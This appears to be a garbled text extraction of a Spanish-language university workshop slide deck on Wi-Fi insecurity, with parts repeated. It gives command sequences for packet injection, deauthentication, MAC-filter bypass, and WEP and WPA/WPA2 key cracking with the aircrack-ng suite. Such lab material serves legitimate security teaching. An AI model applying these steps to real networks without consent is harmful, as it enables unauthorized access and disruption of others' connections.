7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5794
Teacutecnica Pasiva
bull Esperar a que se conecte alguacuten cliente a la WLAN
eacute i i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5894
Teacutecnica Activa
bull Enviacuteo de paquetes de Deauthenticationbull Teclear aireplay-ng -0 5 ndash a aabbccddeeff
mon0
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5994
Monitoreo con Wireshark
M i Wi h k
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6094
Monitoreo con Wireshark
bull Utilizar el filtro(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x08)
Fil d MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6194
Filtrado por MAC
bull Solo la MAC Address permitidas se conectan alared
E t d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6294
Encontrando la MAC
bull
Teclear airodump-ng ndash c 11 ndash a --bssid aabbccddeeff mon0
bull Anotamos la MAC del cliente
C biaacute d l MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6394
Cambiaacutendonos la MAC
bull Teclear ifconfig wlan0 downbull Teclear macchanger ndash m gghhiijjkkll wlan0
bull Teclear ifconfig wlan0 up
Q eacute di
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6494
Queacute aprendimos
VI F ll d i ioacute WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6594
VI- Fallas de encripcioacuten WLAN
bull La mejor manera de proteger los datos en el airees por medio de encriptacioacuten
bull Tres protocolos de encriptacioacuten ndash Wired Equivalent Privacy (WEP)
ndash WiFi Protected Access (WPA)
ndash WiFi Protected Access v2 (WPAv2)
Wi d E i l t P i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6694
Wired Equivalent Privacy
bull Vulnerado desde el 2000
WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6794
WEP
bull RC4 cifrado por corriente (stream cipher )
bull Llave (key) conocida por el cliente y el AP
bull
Para no repetir la Llave utiliza los IV ndash Iniatialization Vector (IV) de 24 bits
bull El problema es el tamantildeo limitado de los IV
WEP I i i d l aacuteli i
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6894
WEP ndash Iniciando el anaacutelisis
bull Teclear ifconfig wlan0 up bull Teclear airmon-ng start wlan0
WEP Preparando la captura
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 6994
WEP - Preparando la captura
bullTeclear airodump-ng mon0 para detectar el AP
bull Teclear airodump-ng - -bssid aabbccddeeff - -
chanell 11 - -write WEPCrackingDemo mon0
WEP Capturando los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7094
WEP ndash Capturando los paquetes
WEP Detectando al cliente
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7194
WEP ndash Detectando al cliente
bull
Detectamos cuando un cliente se conecta a lared utilizando WEP
WEP Archivos generados
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7294
WEP ndash Archivos generados
bull
Si tecleamos ls veremos que se estaacuten creandolos archivos de captura de traacutefico
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7394
WEP ndash Creando maacutes traacutefico
bull
Necesitamos generar traacutefico para obtener maacutescapturas en Data
bull Se utilizaraacuten paquetes ARP para generar traacutefico
bull Teclear aireplay-ng -3 ndash b aabbccddeeff ndash hgghhiijjkkll mon0
WEP Creando maacutes traacutefico
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7494
WEP ndash Creando maacutes traacutefico
bullaireplay comenzaraacute a generar traacutefico el cual severaacute reflejado en la consola del airodump
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7594
WEP - Encontrando la llave
bull
Teclear aircrack-ng WEPCrackingDemo-01cap
WEP Encontrando la llave
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7694
WEP ndash Encontrando la llave
bull
Paquetes requeridos gt= 100 K
Tiempo de un video
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7794
Tiempo de un video
bull
Mientras esperamos veamos un video
Seguridad en redes Wi-Fi (intypedia)
bull Intypedia es una enciclopedia online de
seguridad de informacioacuten
WEP Llave Encontrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7894
WEP ndash Llave Encontrada
WPAWPA2
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 7994
WPAWPA2
bull WPA utiliza el algoritmo Temporal Key Integrity Protocol ( TKIP con RC4)
bull WPA2 utiliza el algoritmo AES-CCMP (Counter Cipher Mode Protocol)
bull Tanto WPA como WPA2 soportan los siguientesmecanismos de autenticacioacuten ndash EAP ndash Servidores RADIUS ndash
Pre-Shared Key (PSK)
bull Vulnerables a ataques de diccionario
WPAWPA2 Handshake
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8094
WPAWPA2 - Handshake
WPAWPA2 ndash El ataque
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8194
WPAWPA2 ndash El ataque
WPAWPA2 ndash Iniciando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8294
anaacutelisis
bull
Teclear airodump-ng ndash bssid aabbccddeeff ndash channel 11 --write WPACrackingDemo mon0
WPAWPA2 ndash Esperando al
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8394
cliente
bull
Podemos esperar a que se conecte un cliente oforzamos la desconexioacuten
bull WPA Handshake
WPAWPA2 ndash Preparando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 394
Atencioacuten
bull Las herramientas y teacutecnicas que se presentaraacuten eneste taller serviraacuten para conocer y evaluar lavulnerabilidad de una WLAN y asiacute desarrollar lamejor estrategia para remediar dichasvulnerabilidades
bull Estas herramientas y teacutecnicas no se deben deutilizar para fines ilegales y sin el
consentimiento de la institucioacuten a evaluar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 494
Agenda
bull Conceptos de Seguridadbull Conociendo BackTrack
bull Armando el Laboratorio
bull Seguridad WLAN
bull Saltaacutendose la autenticacioacuten WLAN
bull
Fallas de encripcioacuten WLAN
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 594
I- Conceptos de Seguridad
bull Seguridad ldquoGrado de proteccioacuten contra unpeligro dantildeo o peacuterdidardquo (Mike Pastore)
bull Se pretende tener ndash Confidencialidad
ndash Integridad
ndash Disponibilidad
bull Datos en proceso almacenados o en traacutensito
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 694
Riesgo
bull Es cualquier posible evento que pudiera causarun peligro dantildeo o peacuterdida
bull El riesgo no se elimina
ndash
Aceptar el Riesgo ndash Minimizar el Riesgo
ndash Transferir el Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 794
Amenaza
bull Causa potencial de un incidente no deseado locual podriacutea resultar en un dantildeo a un sistema u
organizacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 894
Amenazas
Password cracking
Man in the middle
Exploits
Denegacioacuten de servicio
Escalamiento de privilegios
Hacking de Centrales Telefoacutenicas
Keylogging Port scanning
Puertos vulnerables abiertos
Servicios de log inexistentes o que no son revisados
Desactualizacioacuten
Backups inexistentes
Uacuteltimos parches no instalados
Violacioacuten de la privacidad de los empleados
Destruccioacuten de equipamiento
Desastres naturales
Usuarios internos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 994
Maacutes Amenazas
Captura de PC desde el exteriorViolacioacuten de contrasentildeas
Interrupcioacuten de los servicios
VirusMails anoacutenimos con agresiones
Incumplimiento de leyes y regulaciones
Robo o extraviacuteo de notebooks palms
Robo de informacioacuten
Destruccioacuten de soportes documentales
Acceso clandestino a redes
Intercepcioacuten de comunicaciones voz ywireless
Programas ldquobomba troyanosrdquo
Acceso indebido a documentos impresos
Agujeros de seguridad de redes conectadas
Falsificacioacuten de informacioacuten paraterceros
Indisponibilidad de informacioacuten clave
Spamming
Ingenieriacute a social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1094
Vulnerabilidad
bull Error o mala configuracioacuten de Software oHardware que individuos mal intencionadospueden explotar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1194
Vulnerabilidad
bull httpwwwsecurityfocuscom
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1294
Analogiacutea de Seguridad
Acepto el riesgo
Minimizo el riesgo
Transfiero el riesgo
Amenaza
Vulnerabilidad
Riesgo
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1394
Conexioacuten a Medios Alaacutembricos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1494
Conexioacuten a Redes inalaacutembricas
bull WiFi (80211x)bull 80211abull 80211bbull
80211gbull 80211n
bull Timo Arnall Joslashrn Knutsen and Einar SneveMartinussen
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1594
ClapgnagmlEncripcioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1694
Encripcioacuten
bull Privacidadbull Autenticacioacuten
bull Integridad
bull No repudio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1794
Encripcioacuten
bull Encripcioacuten Simeacutetrica
bull Encripcioacuten Asimeacutetrica
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1894
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 1994
II- Armando el Laboratorio
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2094
Paraacutemetros del laboratorio
bull Configuracioacuten del Access Point ndash SSID ldquoWireless Labrdquo
bull Abierto
bull Oculto
bull WEP
bull WPAWPA2
ndash MAC Addressbull 687F7404BE78 (LAN)
bull 687F7404BE7A (WLAN)
ndash Direcciones IPbull WL_AP1 192168165
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2194
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2294
III- Conociendo BackTrack
bull
Compendio de herramientas de software libre parapruebas de seguridad y de penetracioacuten de redbull Puede ser ejecutado de manera LiveDVD o instalado
en un equipo de coacutemputo
bull Herramientas para ndash Recopilacioacuten de informacioacuten ndash Mapeos de puertos ndash Identificacioacuten de vulnerabilidades
ndash Anaacutelisis de aplicaciones Web ndash Herramientas forenses ndash Ingenieriacutea Social
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2394
Iniciando con BackTrack
bull Inserta el DVD en el equipobull Bootear el equipo desde el DVD
bull Hacer clic en BackTrack Text ndash Default Boot Text
Mode
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2494
Iniciando con BackTrack
bull Teclea el comando startx
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2594
Iniciando con BackTrack
bull GUI de BackTrack 5
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2694
Configurando la tarjeta
inalaacutembrica
bull Abre una terminal de consolabull Teclea iwconfig
C fi d l j
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2794
Configurando la tarjeta
inalaacutembrica
bull Teclea ifconfig wlan0 up
bull Teclea ifconfig wlan0
bull Anota la direccioacuten MAC de tu tarjeta
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2894
Conectaacutendose al AP
bull Buscar redes inalaacutembricasbull Teclear iwlist wlan0 scanning
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 2994
Conectaacutendose al AP
bull Teclea iwconfig wlan0 essid ldquo Wireless Labrdquo
bull Teclea iwconfig wlan0
bull Verifica que tengas la MAC del Access Point
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3094
Configurando una IP de la red
bull Teclea ifconfig wlan0 192168xx netmask 2552552550 up
bull Verifica tecleando ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3194
Probando conectividad
bull Haz ping al Access Pointbull Utiliza el comando arp ndash a para verifica la MAC
bull Abre un navegador e intenta navegar
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3294
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3394
IV- Seguridad WLAN
bull Inseguro por disentildeo faacutecil de explotar ndash Packet spoofing
ndash Packet injection
ndash Sniffing
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3494
Capas OSITCP
bull Frames
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3594
Frames WLAN (Beacons)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3694
Campo Type
bull Frames de Administracioacuten ndash Authentication
ndash De-authentication
ndash Association Request Response
ndash maacutes
bull Frames de Control
ndash Request to Send (RTS)
ndash
Clear to Send (CTS) ndash Acknowledgement (ACK)
bull Frames de Datos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3794
Frames Sniffing
bull Utilizaremos Wireshark ndash Airodump-NG
ndash Tcpdump
ndash Tshark
bull Reinicia tu equipo para que sean configuraciones
desde cero
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3894
Modo Monitor
bull Abre una consola de Terminalbull Confirma con iwconfig que reconocioacute tu tarjeta
bull Levanta la tarjeta con ifconfig wlan0 up
bull Confirma que esteacute levantada con ifconfig wlan0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 3994
Modo Monitor
bull Teclea airmon-ngbull Comprueba que encuentre las tarjetas
disponibles
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4094
Interface en modo Monitor
bull Teclea airmon-ng start wlan0 bull Comprueba que se crea una nueva interface
llamada mon0
bull Teclear airmon-ng
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4194
Interface en modo Monitor
bull Teclea ifconfig
bull Comprueba que existe la interface mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4294
Iniciando Wireshark
bull Teclea Wiresharkamp bull Hacer clic en la ventana que aparezca con el
mensaje de que se ejecutaraacute como root
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4394
Monitoreo con Wireshark
bull Selecciona la interface mon0 bull Wireshark comenzaraacute a capturar los paquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4494
Monitoreo con Wireshark
bull Selecciona en la ventana superior alguna liacuteneabull Expande y verifica lo desplegado por en la
ventana de central
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4594
Canales
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4694
Viendo paquetes no encriptados
bull
Encontrar el canal del Access Pointbull Teclear airodump-ng --bssid aabbccddeeff mon0
(MAC del AP)
bull Anotar el canal (ejemplo 11)bull Oprimir Ctrl+C para detener la ejecucioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4794
Ligando al Canal
bull Ligar nuestra tarjeta de red al canal del APbull Teclear iwconfig mon0 channel 11
bull Confirmar tecleando iwconfig mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4894
Sniffing de paquetes
bull Aplicar el siguiente filtro en Wireshark en laseccioacuten Filter
ndash (wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype == 0x20)
ndash Tipos
bull Management (wlanfctype == 0)
bull Control (wlanfctype == 1)
bull Data (wlanfctype == 2)
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 4994
Filtros
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5094
Captura Filtrada
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5194
Inyectando paquetes a la red
bull Modifica el filtro en el Wireshark para que sea(wlanbssid == aabbccddeeff) ampamp
(wlanfctype_subtype==0x08)
bull Ejecuta el comandoaireplay-ng -9 ndashe ldquo Wireless Labrdquo ndash a
aabbccddeeff mon0
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5294
Viendo los paquetes inyectados
bull Regresa al Wireshark debes de ver muchospaquetes
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5394
Queacute apredimos
V- Saltaacutendose la autenticacioacuten
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5494
V Saltaacutendose la autenticacioacuten
WLAN
bull Las WLAN tienen esquemas de autenticacioacutendeacutebiles
bull Se veraacuten diferentes esquemas y coacutemo saltarlos
ndash Descubrimiento de SSIDs
ndash Saltaacutendose filtros por MAC
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5594
SSIDs Ocultos
bull Con Wireshark podemos ver el SSID
l
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 5694
SSID Ocultos
eacute i i
